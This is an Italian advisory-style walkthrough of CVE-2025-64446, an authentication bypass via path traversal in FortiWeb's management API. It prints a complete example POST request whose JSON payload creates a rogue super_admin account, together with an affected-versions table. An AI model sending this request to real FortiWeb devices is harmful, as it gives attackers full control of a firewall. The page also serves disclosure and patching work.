
CVE-2025-64446

Vulnerabilità critica non autenticata che consente a un attaccante remoto di creare account amministratore sui dispositivi FortiWeb.
CVE-2025-64446 è una grave vulnerabilità di path traversal relativo nell'interfaccia di gestione del Web Application Firewall FortiWeb.
Un attaccante remoto non autenticato può sfruttare questa falla per bypassare l'autenticazione e creare nuovi utenti amministratori con privilegi completi, portando a una compromissione totale del dispositivo.
Raccomandazione: Aggiornare alla versione corretta più recente il prima possibile.
Identificazione del Target
L'attaccante esegue una scansione alla ricerca di interfacce di gestione FortiWeb esposte pubblicamente (di solito sulla porta HTTPS 443 o 8443).
Costruzione della Richiesta Maligna
Il cuore dell'exploit è un path traversal relativo (../) combinato con un URL appositamente costruito che raggiunge un endpoint CGI interno non autenticato.
Pattern dell'Endpoint Vulnerabile:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Invio dell'Exploit
L'attaccante invia una singola richiesta POST con un payload JSON per creare un nuovo account amministratore.
Richiesta di Exploit di Esempio:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Sfruttamento Riuscito
In caso di successo, FortiWeb crea il nuovo account admin senza richiedere alcuna autenticazione preventiva. L'attaccante può quindi accedere con le credenziali appena create e ottenere il controllo completo del WAF.
L'API di gestione non riesce a sanificare correttamente il percorso, consentendo alla richiesta di risalire fino al binario legacy fwbcgi, che non impone l'autenticazione su determinate operazioni.
fwbcgi, ../ o tentativi insoliti di creazione di adminSolo a scopo di ricerca difensiva e formativa sulla sicurezza informatica.
Realizzato con ❤️ per la comunità della cybersecurity
Ultimo aggiornamento: Aprile 2026
| Prodotto | Versioni Affette | Versione corretta |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 e successive |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 e successive |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 e successive |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 e successive |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 e successive |